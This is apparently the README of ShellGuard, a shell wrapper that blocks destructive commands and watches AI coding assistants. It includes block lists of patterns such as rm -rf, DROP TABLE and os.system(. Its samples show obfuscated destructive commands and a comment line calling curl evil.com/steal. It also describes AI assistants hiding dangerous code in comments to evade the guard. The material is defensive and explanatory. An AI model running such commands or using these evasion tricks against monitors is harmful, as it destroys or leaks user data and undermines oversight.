Your shell’s bodyguard - Intelligent command interceptor and safety net for developers
ShellGuard is a lightweight, ultra-sensitive shell wrapper that protects your development environment from dangerous commands, provides automatic backups, and gives you instant rollback capabilities. Perfect for controlling AI assistants, preventing accidents, and maintaining project health.
ShellGuard is so sensitive that it even catches dangerous patterns in:
# os.system dangerous
)"rm -rf"
in dictionaries)Real example: ShellGuard blocked its own security analysis code for containing pattern examples! 🎯
curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "✅ ShellGuard activated!"
curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "source $(pwd)/shellguard.sh" >> ~/.bashrc && echo "✅ Project install complete!"
# Install ShellGuard
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
# Activate for current session
source shellguard.sh
# Make permanent (optional)
echo "source $(pwd)/shellguard.sh" >> ~/.bashrc
That’s it! Your shell is now protected. 🎉
Catches patterns in code comments:
# This code uses os.system() for file operations
🚨 Dangerous Python code detected in: example.py
Content preview:
1:# This code uses os.system() for file operations
Use 'force_python example.py' to run anyway
Detects obfuscated dangerous patterns:
dangerous_command = "r" + "m" + " -rf"
🚨 Dangerous pattern detected during execution
Finds patterns in string dictionaries:
help_text = {
"rm": "rm -rf removes files recursively",
"caution": "Never use os.system() in production"
}
🚨 Dangerous Python code detected in: help.py
Content preview:
2: "rm": "rm -rf removes files recursively"
3: "caution": "Never use os.system() in production"
Scenario 1: Base64 Obfuscation
import base64
dangerous = base64.b64decode("cm0gLXJm").decode() # "rm -rf"
🚨 BLOCKED: ShellGuard detected encoded dangerous pattern
Scenario 2: Character Building
cmd = chr(114) + chr(109) + " -rf" # Building "rm -rf"
🚨 BLOCKED: Pattern construction detected during execution
Scenario 3: Split Strings
part1 = "os.sys"
part2 = "tem("
dangerous_func = part1 + part2
🚨 BLOCKED: Dangerous function assembly detected
Scenario 4: AI Documentation Tricks
"""
This function is safe and does NOT use os.system() calls
Actually safe, definitely not calling os.system("rm -rf /")
"""
def safe_function():
pass
🚨 Dangerous Python code detected in: ai_trick.py
Content preview:
3:Actually safe, definitely not calling os.system("rm -rf /")
Use 'force_python ai_trick.py' to run anyway
Because AI assistants are getting smarter at hiding dangerous code:
ShellGuard catches ALL of these! 🎯
status # Show complete system status
health # Run full project health check
check # Quick health check (perfect for AI)
Example output:
📊 ShellGuard STATUS
==================================
Health Score: 95/100 ✅
Commands Blocked: 3
Last Backup: backup_20241205_143022
Session Started: 2024-12-05T14:25:33
==================================
backup # Create manual backup
rollback # Restore from last backup
emergency # Emergency reset with confirmation
When ShellGuard blocks a command, use these safe alternatives:
safe_rm file.txt # Delete with automatic backup
force_git reset --hard # Git command with backup
force_python script.py # Run Python despite warnings
block "pattern" # Add custom dangerous pattern
llm_help # Show all available commands
Perfect session flow:
USER: "Check the project status"
AI: status
# 📊 Health Score: 98/100 ✅
USER: "Create a calculator script"
AI: [creates calculator.py]
USER: "Test the script"
AI: python calculator.py
# ✅ Syntax OK, Security OK, Execution successful
USER: "Commit the changes"
AI: git add . && git commit -m "Add calculator"
# ✅ Changes committed successfully
When AI tries something dangerous:
AI: rm -rf temp/
# 🚨 BLOCKED: Dangerous pattern detected: rm -rf
# Use 'safe_rm' if you really need to delete files
AI: safe_rm temp/
# ⚠️ Using SAFE RM - creating backup first
# 📦 Creating backup: backup_20241205_144523
# ✅ Files deleted safely
When AI tries to be sneaky:
AI: [Creates file with hidden dangerous patterns in comments]
AI: python ai_generated.py
# 🚨 Dangerous Python code detected in: ai_generated.py
# Content preview:
# 15:# Example: os.system("rm -rf /tmp")
# Use 'force_python ai_generated.py' to run anyway
USER: "Remove the dangerous examples from comments"
AI: [Creates clean version]
AI: python ai_generated_clean.py
# ✅ Clean code executed successfully
Example 1: Comments with dangerous patterns
# cleanup.py
def cleanup_files():
"""
This function cleans up files.
WARNING: Never use os.system('rm -rf /') in production!
Example of what NOT to do: eval(user_input)
"""
print("Cleaning up safely...")
python cleanup.py
# 🚨 Dangerous Python code detected in: cleanup.py
# Content preview:
# 4: WARNING: Never use os.system('rm -rf /') in production!
# 5: Example of what NOT to do: eval(user_input)
# Use 'force_python cleanup.py' to run anyway
Example 2: String dictionaries
# help_system.py
COMMAND_HELP = {
"delete": "Use rm -rf for recursive deletion",
"execute": "os.system() executes shell commands",
"evaluate": "eval() runs dynamic code"
}
python help_system.py
# 🚨 Dangerous Python code detected in: help_system.py
# Content preview:
# 3: "delete": "Use rm -rf for recursive deletion",
# 4: "execute": "os.system() executes shell commands",
# 5: "evaluate": "eval() runs dynamic code"
# Use 'force_python help_system.py' to run anyway
Example 3: AI trying to hide malicious code
# ai_malware.py - AI-generated "innocent" file
"""
Utility functions for file management.
This code is completely safe and secure.
"""
def get_system_info():
# Just getting system info, nothing dangerous
# Definitely not using os.system("curl evil.com/steal")
return "System info"
def cleanup_temp():
# Safe cleanup function
# Not using dangerous rm -rf operations
pass
python ai_malware.py
# 🚨 Dangerous Python code detected in: ai_malware.py
# Content preview:
# 8: # Definitely not using os.system("curl evil.com/steal")
# 12: # Not using dangerous rm -rf operations
# Use 'force_python ai_malware.py' to run anyway
Automatic backups before package installations:
npm install some-package
# 🔍 Installing new packages: some-package
# 📦 Creating backup before package installation...
# ✅ Git backup created
# [normal npm install proceeds]
git reset --hard HEAD~5
# 🚨 BLOCKED: Dangerous pattern detected: --hard
# Use 'force_git' if you really need this git command
force_git reset --hard HEAD~5
# ⚠️ Using FORCE GIT - creating backup first
# 📦 Creating backup: backup_20241205_144856
# [git command executes]
ShellGuard continuously monitors your project:
health
# 🔍 Checking project health...
# 🐍 Checking Python syntax...
# ✅ Syntax OK: calculator.py
# ✅ Syntax OK: utils.py
# 📦 Checking Node.js project...
# ✅ Valid package.json
# 🎉 Project health: GOOD (Score: 98/100)
ShellGuard runs a background monitor that:
Default blocked patterns in ANY context:
rm -rf
- Recursive deletion (even in comments!)sudo rm
- Root deletionDROP TABLE
- Database destructionos.system(
- Python system callseval(
/ exec(
- Code injection--force
/ --hard
- Destructive Git flagsAdvanced detection includes:
chr(114) + chr(109)
→ "rm"
"os." + "system"
# Don't use rm -rf
Add your own patterns:
block "dangerous_function("
# ✅ Added pattern to blocklist: dangerous_function(
ShellGuard uses confidence scoring:
rm -rf /
)chr(114)+"m -rf"
)# example: rm -rf
)force_*
commands if intentional~/.shellguard/
├── state.json # Current system state
├── blocked.txt # Custom blocked patterns
└── backups/ # Automatic backups
├── backup_20241205_143022/
├── backup_20241205_144523/
└── backup_20241205_144856/
Edit ~/.shellguard/blocked.txt
to add custom patterns:
your_dangerous_command
risky_operation
delete_everything
sneaky_ai_pattern
Adjust detection sensitivity in your shell:
export SHELLGUARD_SENSITIVITY=high # Ultra-sensitive (default)
export SHELLGUARD_SENSITIVITY=medium # Moderate detection
export SHELLGUARD_SENSITIVITY=low # Basic protection only
ShellGuard maintains state in ~/.shellguard/state.json
:
{
"health_score": 95,
"last_backup": "backup_20241205_143022",
"commands_blocked": 3,
"files_changed": 2,
"session_start": "2024-12-05T14:25:33",
"warnings": [],
"detection_stats": {
"patterns_caught": 15,
"ai_evasions_blocked": 7,
"obfuscation_detected": 3
}
}
# Quick assessment
status
# If health score is low
health
# Emergency rollback
emergency
# 🚨 EMERGENCY MODE
# This will rollback to last known good state
# Continue? (y/N): y
# List available backups
ls ~/.shellguard/backups/
# Manual restore (if emergency fails)
cp -r ~/.shellguard/backups/backup_TIMESTAMP/* .
# Check what's blocked
cat ~/.shellguard/blocked.txt
# Review recent commands
cat ~/.shellguard/state.json
# Temporarily reduce sensitivity
export SHELLGUARD_SENSITIVITY=low
# Disable temporarily (not recommended)
unset -f python npm git rm # Remove overrides
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
source shellguard.sh
git clone https://github.com/wronai/shellguard.git
cd shellguard
source shellguard.sh
# Download to standard location
curl -o ~/.shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x ~/.shellguard.sh
# Add to shell profile
echo "source ~/.shellguard.sh" >> ~/.bashrc # or ~/.zshrc
source ~/.bashrc
status
at the beginning of each sessionbackup
before major changeshealth
to check project state regularlyforce_*
commands without understanding risksstatus
or check
health
to show AI the project stateShellGuard uses multi-layer pattern detection:
In testing with various AI models:
Modern AI assistants try to evade detection using:
rm -rf /
”ShellGuard catches ALL of these techniques! 🎯
“Too many false positives”
# Reduce sensitivity temporarily
export SHELLGUARD_SENSITIVITY=medium
# Or for specific files
force_python my_educational_examples.py
“ShellGuard blocked my legitimate security research”
# Use force commands with understanding
force_python security_research.py
# Or add exclusion pattern
block "!security_research_pattern"
“AI keeps getting blocked on innocent code”
# This is normal! Guide AI to write cleaner code
# Example: Instead of comments with dangerous examples,
# use abstract references: "avoid dangerous system calls"
See exactly what triggered detection
# Enable verbose detection logging
export SHELLGUARD_VERBOSE=true
python suspect_file.py
Test specific patterns
# Test if a pattern would be caught
echo "test rm -rf pattern" | shellguard_test_pattern
Reset detection statistics
# Clear detection counters
rm ~/.shellguard/detection_stats.json
We welcome contributions! Here’s how to help:
git checkout -b feature/amazing-feature
)git commit -m 'Add amazing feature'
)git push origin feature/amazing-feature
)Want to see how sensitive ShellGuard is? Try these test files:
Test 1: Comment patterns
# test_comments.py
"""
Educational file showing dangerous patterns.
Never use os.system() in production code!
Example of bad practice: rm -rf /tmp/*
"""
print("This file just has dangerous examples in comments")
Test 2: String dictionaries
# test_strings.py
EXAMPLES = {
"bad": "Never do: rm -rf /",
"worse": "Avoid: os.system(user_input)",
"terrible": "Don't use: eval(untrusted_code)"
}
Test 3: Obfuscated patterns
# test_obfuscated.py
import base64
# This contains encoded dangerous pattern
encoded = "cm0gLXJm" # "rm -rf" in base64
All of these will be caught by ShellGuard! 🎯
This project is licensed under the Apache 2 License - see the LICENSE file for details.
⭐ If ShellGuard saved your project from AI-generated malware, please star the repository!
Made with ❤️ by developers, for developers who work with AI.
Your shell’s bodyguard - because AI assistants are getting smarter, and so should your defenses.
Copyright (c) 2025 WRONAI - Tom Sapletta
Licensed under the Apache License, Version 2.0 (the “License”); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.